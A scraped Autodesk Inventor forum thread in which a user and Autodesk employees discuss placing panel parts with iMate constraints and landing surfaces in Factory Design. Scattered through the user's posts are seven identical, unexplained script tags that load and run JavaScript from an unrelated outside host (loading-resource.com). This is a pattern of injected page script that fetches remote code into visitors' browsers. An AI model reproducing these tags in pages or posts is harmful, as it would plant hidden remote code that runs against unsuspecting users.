Inventor General Discussion

Reply
Mentor
j.vanderheijden
Posts: 237
Registered: ‎06-13-2011
Message 11 of 17 (177 Views)

Re: iMate

09-13-2012 02:32 PM in reply to: johnsonshiue

You mean i have to place an assy with that imate first.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mvg Jos

Your drawings are only as good as the symbols that complete them...
Employee
johnsonshiue
Posts: 2,191
Registered: ‎04-30-2008
Message 12 of 17 (175 Views)

Re: iMate

09-13-2012 02:35 PM in reply to: j.vanderheijden

Either a part or a subassembly will do. Basically, the target of iMate at the top level assembly is for iMate from another component when they are at the same level.



Johnson Shiue (johnson.shiue@autodesk.com)
Principal SQA Engineer, Inventor
Mechanical Design
Autodesk, Inc.

Mentor
j.vanderheijden
Posts: 237
Registered: ‎06-13-2011
Message 13 of 17 (170 Views)

Re: iMate

09-13-2012 10:49 PM in reply to: johnsonshiue

I am working most of the time in Factory Design.

Isn't there a way to do something with the layout that is placed when you open a factory drawing.

I don't want to work with assets for my part 700.ipt

Mvg Jos

Your drawings are only as good as the symbols that complete them...
Employee
jeff.pek
Posts: 332
Registered: ‎07-29-2008
Message 14 of 17 (151 Views)

Re: iMate

09-14-2012 07:55 AM in reply to: j.vanderheijden

Hi Jos -

 

Just got involved here.

Can you expand on what you're thinking a bit to help me understand?

 

What do you mean by "Isnt't there a way to do something with the layout..."? 

When you place an asset (that has a landing surface) into a layout with floor snap on, it will automatically create a workplane on the floor, and constrain the component to that.

 

Jeff

Mentor
j.vanderheijden
Posts: 237
Registered: ‎06-13-2011
Message 15 of 17 (130 Views)

Re: iMate

09-16-2012 04:39 AM in reply to: jeff.pek

Hi Jeff

Thanks for involved.

First, i don't use assets for some of my parts see topic:http://forums.autodesk.com/t5/Autodesk-Factory-Design-Suite/sketch-asset/td-p/3450242

But what i want to know is can i use the Landing Surface out side an asset?

I would like to do that in my part without publish my part to an asset.

But i think I have another solution.
The thing I want is the following.
I first place some 'HoofdBandRaster' parts.
These are normally geconstrained to another part but that's irrelevant here.
Then I place one or more 'BandrasterStandardPaneel' parts.
Now I would like to place the first panel which would be equal to the bottom of the bandraster, or to have the XY Plane.
Now I have made in both parts the same iMate, 'OnderKantBandraster'.
If I have a panel place I click to the site to accept but the panel takes another iMate of Bandraster and then right mouse click and select "Skip remaining iMate results' and the panel get past the last placed Bandraster placed with the underside geconstrained.
Now I can move freely but the panel bottom sides remain constraind.
Now I can place the following  constrain to  apply to the panel to the right side of the Bandraster to constrain.
Then I can place multiple panels.

So what is the story, i want the first placed panel constrained to the bottom of the BandRaster and then move the panel free but will be constrained to the bottom of the BandRaster and then constain one side of the panel to the site of the BandRaster.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mvg Jos

Your drawings are only as good as the symbols that complete them...
Mentor
j.vanderheijden
Posts: 237
Registered: ‎06-13-2011
Message 16 of 17 (89 Views)

Re: iMate

10-02-2012 12:31 PM in reply to: johnsonshiue

I have another workflow.
I first place another part, Bandraster.
That part, Bandraster, is constrained on another part with imates.
Then I place the panel.
I now have a iMate created in part Panel.
This iMate is at the bottom in the browser and is equal to the iMate in Bandraster.
When I place my first panel it will use that imate and so the bottom will be constraind to the bottom of the Bandraster.
If I place a second panel it will constrain to the panel because there are more imates in the Panel.
The iMate equal to the bandraster will not be used.
Now I want place Panels on two sides of the Bandraster placed with imates.
If I then place the next panel I rmk and select 'Generate remaining imates results' and the iMate of the Bandraster is used.
Then I constrain the panel to the Bandraster and the bottom sides remain equal.
I can then randomly place panels and switch between imates of the panels with rmk and select 'Next iMate component'.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mvg Jos

Your drawings are only as good as the symbols that complete them...
Employee
johnsonshiue
Posts: 2,191
Registered: ‎04-30-2008
Message 17 of 17 (80 Views)

Re: iMate

10-02-2012 02:38 PM in reply to: j.vanderheijden

I think I know what you are talking about. But, to be sure, it would be better if you can show me an example. iMate behaviors can be subtle sometimes. We can go round and round, if we are not talking about the same thing.

Thanks!

 



Johnson Shiue (johnson.shiue@autodesk.com)
Principal SQA Engineer, Inventor
Mechanical Design
Autodesk, Inc.

Need installation help?

Start with some of our most frequented solutions or visit the Installation and Licensing Forum to get help installing your software.